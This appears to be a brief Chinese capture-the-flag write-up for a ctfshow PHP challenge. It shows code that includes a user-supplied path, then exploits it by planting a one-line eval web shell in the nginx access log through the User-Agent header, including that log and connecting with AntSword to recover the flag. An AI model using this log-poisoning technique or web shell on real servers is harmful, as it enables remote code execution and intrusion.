<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/php/i",$c)){
include($c);
}
}else{
highlight_file(__FILE__);
}
?>
c传参过滤掉php
思路:include文件包含,利用日志文件包含
访问日志文件:
?c=/var/log/nginx/access.log
发现日志文件记录了user-agent头,于是在该头中插入一句话木马:
<?php eval($_POST['a']);?>
再访问日志文件,看日志文件是否记录有一句话木马
哈哈哈,当然看不到
成功之后antsword:
flag:
<?php
$flag = "ctfshow{3e1a8268-6360-45c6-8cd1-8f1e06538906}";
?>